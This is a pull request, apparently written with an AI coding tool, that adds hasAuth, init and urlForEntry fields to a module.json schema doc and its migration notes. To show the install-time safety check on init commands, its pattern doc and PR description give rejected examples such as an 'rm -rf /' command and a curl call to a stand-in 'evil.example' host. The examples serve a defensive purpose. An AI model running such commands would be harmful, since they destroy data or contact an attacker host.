### PR TITLE
patterns(module-json): add hasAuth, init, urlForEntry — closes hub#100

### DIFF
--- a/adoption/migration-notes.md
+++ b/adoption/migration-notes.md
@@ -5,6 +5,51 @@ entries on top. Each entry: date, change, affected repos, status.
 
 ---
 
+## 2026-04-30 — `module.json` gains `hasAuth`, `init`, `urlForEntry`
+
+**Change:** [`module-json-extensibility.md`](../patterns/module-json-extensibility.md)
+adds three optional fields so the canonical schema can carry behaviors
+hub's transitional `FIRST_PARTY_FALLBACKS.extras` block currently holds:
+
+- `hasAuth: boolean` — module is itself an OAuth resource server. Drives
+  the default `publicExposure` for `kind: "api" | "tool"` services.
+- `init: { command: [string, ...string[]] }` — post-install one-shot.
+  Safety constraint: `command[0]` must equal a bin from the installed
+  npm package (rejects e.g. `["rm", "-rf", "/"]` at install time).
+- `urlForEntry.perConsumer.<consumerId>: { appendPath? | replaceWith? }`
+  — declarative URL adjustment per well-known consumer (today's only
+  case: claude.ai → vault gets `/mcp` appended).
+
+Aaron's call recorded 2026-04-30: **path 1 (extend the schema) over
+path 2 (codify a permanent extras lane)**. Closes
+[`parachute-hub#100`](https://github.com/ParachuteComputer/parachute-hub/issues/100).
+Backwards-compatible — every new field is optional with a sensible
+"absent" default, so existing `module.json` files stay valid.
+
+**Affected:**
+
+- `parachute-patterns` — pattern doc updated (this PR). No code change.
+- `parachute-hub` — needs a parser update in `src/module-manifest.ts`
+  (read the three new fields, route them through `composeServiceSpec`)
+  and an install-time bin-name check for `init.command[0]` (resolved
+  via the installed package's `package.json` `bin` field). Tracked by
+  hub#100.
+- `parachute-vault` — emit `hasAuth: true`, `init: { command:
+  ["parachute-vault", "init"] }`, and `urlForEntry.perConsumer["claude.ai"]:
+  { appendPath: "/mcp" }` in `.parachute/module.json`. One PR.
+- `parachute-scribe` — emit `hasAuth: false` (until `SCRIBE_AUTH_TOKEN`
+  ships) and `urlForEntry.perConsumer` if needed. One PR.
+- `parachute-notes` — emit baseline fields (no `hasAuth`, no `init`).
+  One PR.
+- `parachute-hub` (cleanup) — delete each module's `FALLBACK:` entry in
+  `src/service-spec.ts` once its upstream `module.json` ships the
+  equivalent declarations. One PR per module.
+
+**Status:** pattern doc landed (`parachute-patterns#TBD`). Downstream
+parser + emit + retirement PRs pending.
+
+---
+
 ## 2026-04-28 — Vault scopes are resource-bound (`vault:<name>:<verb>`)
 
 **Change:** the hub's OAuth picker rewrites an unnamed `vault:<verb>`

--- a/adoption/migration-notes.md
+++ b/adoption/migration-notes.md
@@ -37,15 +37,16 @@ Backwards-compatible — every new field is optional with a sensible
 - `parachute-vault` — emit `hasAuth: true`, `init: { command:
   ["parachute-vault", "init"] }`, and `urlForEntry.perConsumer["claude.ai"]:
   { appendPath: "/mcp" }` in `.parachute/module.json`. One PR.
-- `parachute-scribe` — emit `hasAuth: false` (until `SCRIBE_AUTH_TOKEN`
-  ships) and `urlForEntry.perConsumer` if needed. One PR.
+- `parachute-scribe` — omit `hasAuth` (absent = `false`, the conservative
+  default until `SCRIBE_AUTH_TOKEN` ships); emit `urlForEntry.perConsumer`
+  if needed. One PR.
 - `parachute-notes` — emit baseline fields (no `hasAuth`, no `init`).
   One PR.
 - `parachute-hub` (cleanup) — delete each module's `FALLBACK:` entry in
   `src/service-spec.ts` once its upstream `module.json` ships the
   equivalent declarations. One PR per module.
 
-**Status:** pattern doc landed (`parachute-patterns#TBD`). Downstream
+**Status:** pattern doc landed (`parachute-patterns#19`). Downstream
 parser + emit + retirement PRs pending.
 
 ---

--- a/patterns/module-json-extensibility.md
+++ b/patterns/module-json-extensibility.md
@@ -37,7 +37,14 @@ one file the author controls.
   "port": 7001,
   "paths": ["/my-service"],
   "health": "/health",
+  "hasAuth": true,
   "startCmd": ["bin/my-service", "serve"],
+  "init": { "command": ["my-service", "init"] },
+  "urlForEntry": {
+    "perConsumer": {
+      "claude.ai": { "appendPath": "/mcp" }
+    }
+  },
   "scopes": { "defines": ["my-service:read", "my-service:write"] },
   "dependencies": {
     "vault": { "optional": true, "scopes": ["vault:read"] }
@@ -55,9 +62,147 @@ one file the author controls.
 | `port` | Default loopback port. Pick outside the reserved Parachute range (`1939–1949`) — see [`canonical-ports.md`](./canonical-ports.md). The CLI warns on collision but does not block. |
 | `paths` | URL paths the module serves under the hub origin. |
 | `health` | Path for liveness probes. |
+| `hasAuth` | `true` if the module is itself an OAuth resource server (gates its own endpoints behind auth). Drives default public-exposure policy and tunnel/funnel treatment. Optional; defaults to `false`. See [Install-time behaviors](#install-time-behaviors) below. |
 | `startCmd` | Argv the CLI invokes for `parachute start <name>`. Resolved relative to the installed package. |
+| `init` | Optional post-install one-shot the CLI runs after `parachute install <name>`. Object with a `command` argv. Safety: first arg must equal a bin defined by the installed npm package. See [Install-time behaviors](#install-time-behaviors). |
+| `urlForEntry` | Optional declarative URL adjustments keyed by consumer. Today's only operations: `appendPath` (append a suffix) or `replaceWith` (full override). See [Install-time behaviors](#install-time-behaviors). |
 | `scopes.defines` | OAuth scopes the module owns. Namespaced by `name` so collisions don't happen — see [`oauth-scopes.md`](./oauth-scopes.md). |
 | `dependencies` | Other modules this one wants to talk to. Each entry has `optional` and `scopes` fields; CLI uses these to auto-wire on install (env-var injection) — see [`service-to-service-auth.md`](./service-to-service-auth.md). |
+
+## Install-time behaviors
+
+`hasAuth`, `init`, and `urlForEntry` were added 2026-04-30 (parachute-hub#100)
+to close the gap between `module.json` and the hub's transitional
+`FIRST_PARTY_FALLBACKS` extras block. Aaron's call: **path 1 — extend the
+schema — over path 2 — codify a permanent extras lane.** Rationale: extras
+exists only for first-party modules and is meant to retire; if a behavior
+is real enough to ship in vault, it's real enough to be declarable by any
+module. All three fields are optional and missing defaults to "no" /
+"none", so existing manifests are valid unchanged.
+
+### `hasAuth: boolean`
+
+```ts
+hasAuth?: boolean;  // default false
+```
+
+Declares the module as an OAuth resource server — i.e., it validates
+bearer tokens on its own endpoints. The hub uses this to derive
+`publicExposure`'s default for `kind: "api" | "tool"` services: with
+`hasAuth: true` they default to `"allowed"` (safe to expose because the
+module gates itself); without it they default to `"auth-required"`
+(treated as loopback at expose time until the operator opts in
+explicitly). It also informs how `parachute expose` and the discovery
+surface treat bearer-bearing modules. `kind: "frontend"` modules ignore
+this field — they default to `"allowed"` regardless.
+
+Trivially declarative — the value doesn't change at runtime. If a
+module's auth gate is conditional on a config flag (e.g., scribe with /
+without `SCRIBE_AUTH_TOKEN`), declare the conservative default here and
+let the runtime overwrite via an explicit `publicExposure` write to its
+`services.json` row when configuration confirms auth is on.
+
+### `init: { command: [string, ...string[]] }`
+
+```ts
+init?: {
+  command: readonly [string, ...string[]];  // non-empty argv
+};
+```
+
+Post-install one-shot the CLI runs once after `parachute install <name>`
+completes. Used today by vault to seed its data directory:
+
+```json
+{ "init": { "command": ["parachute-vault", "init"] } }
+```
+
+**Safety constraint (mandatory).** The first arg of `command` MUST equal
+a bin name declared by the installed npm package (resolved at install
+time via the package's `package.json` `bin` field). The hub rejects the
+manifest at install time otherwise. This rules out things like:
+
+```json
+{ "init": { "command": ["rm", "-rf", "/"] } }   // REJECTED at install time
+{ "init": { "command": ["curl", "evil.example"] } }  // REJECTED
+```
+
+The constraint is structural, not advisory. It means a malicious or
+broken `module.json` cannot trick the CLI into invoking arbitrary
+binaries on the user's `$PATH` — the only thing `init` can run is the
+package's own published code. Subsequent args (after the bin name) are
+passed through verbatim and are the module's own concern.
+
+**Failure mode.** If the init command exits non-zero, `parachute install`
+fails hard and surfaces the exit code + stderr. No retries, no silent
+continue — partial-init state is the kind of bug that's worse to mask
+than to surface.
+
+**Idempotency is the module's responsibility.** The CLI runs `init` once
+per `parachute install` invocation; modules whose init touches durable
+state should make repeated runs safe (e.g., vault's `init` is a no-op if
+the data directory already exists).
+
+### `urlForEntry.perConsumer`
+
+```ts
+urlForEntry?: {
+  perConsumer: {
+    [consumerId: string]: {
+      appendPath?: string;   // suffix appended to the canonical URL
+      replaceWith?: string;  // full URL override (escape hatch)
+    };
+  };
+};
+```
+
+Declarative URL adjustments for specific consumers. Replaces the
+`urlForEntry: (entry) => string` JS callback the hub's `VAULT_FALLBACK`
+carries today.
+
+The canonical URL for a service is `http://127.0.0.1:<port><paths[0]>`
+(with trailing slashes stripped). Most clients hit that URL directly.
+A few well-known consumers need an adjustment because their conventions
+diverge — today's only real case is claude.ai, which expects vault's MCP
+endpoint at `<base>/mcp` rather than the bare mount path:
+
+```json
+{
+  "urlForEntry": {
+    "perConsumer": {
+      "claude.ai": { "appendPath": "/mcp" }
+    }
+  }
+}
+```
+
+**Operations (exactly one per consumer entry).**
+
+- `appendPath`: string suffix concatenated to the canonical URL after
+  trailing-slash normalization. Most common case.
+- `replaceWith`: full absolute URL replacing the canonical one entirely.
+  Escape hatch for services whose endpoint isn't path-derivable from the
+  module's mount (e.g., scribe today serves at the bare port root, not
+  under `/scribe`).
+
+Specifying both is a validation error. Specifying neither is a
+validation error.
+
+**Consumer-id resolution.** The `consumerId` key is matched against a
+list of well-known consumer IDs the hub curates (e.g., `claude.ai`,
+`chatgpt.com`). The hub publishes the list at `/.parachute/consumers`
+(target — not yet shipped); for now, treat the list as the union of
+consumers any first-party module references. Unknown consumer IDs in a
+manifest are validated for shape but ignored at lookup time — they
+become live the moment the hub adds their definition. The lookup is
+exact-match on the consumer ID string; no regex or template
+substitution at v1.
+
+**Why no template / regex / per-request logic.** YAGNI. The vault
+`urlForEntry` callback the hub ships today is a closure over a single
+constant `/mcp` suffix; a regex lookup table is more complexity than the
+problem warrants. Re-evaluate if a third consumer needs a non-`appendPath`
+shape that doesn't reduce to `replaceWith`.
 
 ## Why this shape
 
@@ -113,6 +258,11 @@ packages that pre-date the convention, then retires.
   outside; the CLI warns but does not block.
 - **`startCmd` must be argv, not a shell string.** Avoids
   shell-injection weirdness when users have spaces in package paths.
+- **`init.command[0]` must be a bin from the installed package.** The
+  CLI rejects manifests at install time when `init.command[0]` isn't
+  declared as a bin in the package's `package.json`. This keeps `init`
+  from invoking arbitrary `$PATH` binaries — see [Install-time
+  behaviors](#install-time-behaviors) above.
 - **`module.json` is shipped in the npm artifact.** Not in
   `.gitignore`, not generated at install time. The CLI reads it
   post-install from the installed package directory.
@@ -152,15 +302,50 @@ packages that pre-date the convention, then retires.
   is the live shape until this pattern doc and the CLI implementation
   catch up.
 
+## Versioning
+
+The schema is **backwards-compatible**. Every field added to date —
+including the 2026-04-30 `hasAuth` / `init` / `urlForEntry` extension —
+is optional with a sensible "absent" default. Existing manifests stay
+valid; existing parsers ignore fields they don't understand. When (if)
+the shape evolves breakingly, we'll add a `manifestVersion: 1`
+discriminator. Defer until a v2 shape is real.
+
+## Migration
+
+The 2026-04-30 schema extension exists to retire hub's transitional
+`FIRST_PARTY_FALLBACKS.extras` block (see
+`parachute-hub/src/service-spec.ts`). Sequence:
+
+1. **This PR (parachute-patterns)** — define the three fields. Done.
+2. **parachute-hub parser update** — extend `module-manifest.ts`'s
+   validator to read the new fields, route them through
+   `composeServiceSpec` so the spec produced from a real `module.json`
+   carries the same `hasAuth` / `init` / `urlForEntry` semantics the
+   fallback's `extras` block does. Add the `init.command[0]` bin-name
+   check at install time (resolved via the installed package's
+   `package.json` `bin`).
+3. **vault / scribe / notes** — emit the new fields in their shipped
+   `.parachute/module.json`. One PR per module.
+4. **parachute-hub fallback retirement** — delete each module's
+   `FALLBACK:` entry once the corresponding upstream `module.json`
+   carries the equivalent declarations.
+
+Until step 2 ships, the new fields validate only against this doc, not
+against running code. Authors writing third-party modules can include
+them today; the hub will start honoring them once the parser update
+lands.
+
 ## Open questions
 
 - **Schema location.** Do we publish a JSON Schema for `module.json`
   (e.g. `https://parachute.computer/schemas/module.json/v1`)?
   Defer until the validator is being written — premature otherwise.
-- **Versioning.** Today there's no `version` field on `module.json`
-  itself (separate from the package's `version`). If/when the shape
-  evolves breakingly, we'll need a `manifestVersion: 1` discriminator.
-  Defer until a v2 shape is real.
+- **Consumer registry.** `urlForEntry.perConsumer` keys against the
+  hub's curated consumer list. Today that list is implicit (defined by
+  the union of `module.json` references). Surface it as
+  `/.parachute/consumers` once a third consumer arrives; until then the
+  list of "well-known" consumers is short enough to keep in code.
 - **Capabilities.** The richer `manifest` shape in the design doc has
   `capabilities`, `iconUrl`, `endpoints` etc. Today most of those
   duplicate what `/.parachute/info` already exposes at runtime.

--- a/patterns/module-json-extensibility.md
+++ b/patterns/module-json-extensibility.md
@@ -148,6 +148,7 @@ the data directory already exists).
 ```ts
 urlForEntry?: {
   perConsumer: {
+    // exactly one of appendPath or replaceWith per consumer entry
     [consumerId: string]: {
       appendPath?: string;   // suffix appended to the canonical URL
       replaceWith?: string;  // full URL override (escape hatch)


### PR DESCRIPTION
## Summary

Extends the canonical `module.json` schema with three optional fields so the contract can carry behaviors hub's transitional `FIRST_PARTY_FALLBACKS.extras` block currently holds. Closes [parachute-hub#100](https://github.com/ParachuteComputer/parachute-hub/issues/100) by unblocking fallback retirement.

- **`hasAuth: boolean`** — module is itself an OAuth resource server. Drives the default `publicExposure` for `kind: "api" | "tool"` services (with `hasAuth: true` they default to `"allowed"`; without, `"auth-required"`). `kind: "frontend"` ignores it.
- **`init: { command: [string, ...string[]] }`** — post-install one-shot the CLI runs after `parachute install <name>`. **Safety constraint: `command[0]` MUST equal a bin from the installed npm package** (rejects `["rm","-rf","/"]` etc. at install time). Vault uses `init: { command: ["parachute-vault", "init"] }`.
- **`urlForEntry.perConsumer.<consumerId>: { appendPath? | replaceWith? }`** — declarative URL adjustment per well-known consumer. Today's only case: claude.ai → vault gets `/mcp` appended. No regex / template substitution at v1 (YAGNI).

Aaron's decision recorded 2026-04-30: **path 1 (extend the schema) over path 2 (codify a permanent extras lane)**. Rationale: extras exists only for first-party modules and is meant to retire; if a behavior is real enough to ship in vault, it's real enough to be declarable by any module.

Backwards-compatible: every new field is optional with a sensible "absent" default. Existing manifests stay valid; existing parsers ignore unknown fields.

## What changed

- `patterns/module-json-extensibility.md` — three new fields added to the JSON shape, the field table, and a new "Install-time behaviors" section with TS-style schema fragments, JSON examples, semantics, and safety constraints. Adds a "Migration" section laying out the downstream PR sequence and a "Versioning" section establishing the backwards-compat rule.
- `adoption/migration-notes.md` — new entry dated 2026-04-30 with affected repos and status.

## Downstream sequence (not in this PR)

1. ✅ This PR — pattern doc.
2. `parachute-hub` parser update — `src/module-manifest.ts` reads the three new fields; `composeServiceSpec` routes them; install adds the `init.command[0]` bin-name check resolved via the installed package's `package.json` `bin` field.
3. `parachute-vault` / `parachute-scribe` / `parachute-notes` — emit the new fields in their `.parachute/module.json`. One PR per module.
4. `parachute-hub` — delete each `FALLBACK:` entry in `src/service-spec.ts` once its upstream `module.json` ships the equivalent declarations.

## Patterns check

- **Touches:** `module-json-extensibility.md` — extends, doesn't replace. Backwards-compatible additive change.
- **Conformance:** keeps the install-time-vs-runtime boundary (`module.json` for install/route; `/.parachute/info` for runtime metadata).
- **Establishes/changes:** establishes the safety pattern of "init's bin-name must come from the installed package" — preventing arbitrary `\$PATH` invocation. This is new vocabulary worth a future cross-cutting note if other install-time hooks land.

## Test plan

- [ ] Reviewer confirms the three field shapes match what hub's `VAULT_FALLBACK` carries today (no semantic drift).
- [ ] Reviewer confirms the `init` safety constraint (first-arg-must-be-own-bin) reads as buildable — i.e., the rule is implementable in the hub parser by reading the installed package's `package.json` `bin` field.
- [ ] Reviewer confirms the `urlForEntry.perConsumer` shape covers vault's claude.ai → `/mcp` case and leaves room for the scribe-style "endpoint at root, not under mount path" case via `replaceWith`.
- [ ] Docs-only — no rc bump (per CLAUDE.md: this repo has no build/lint/version).

🤖 Generated with [Claude Code](https://claude.com/claude-code)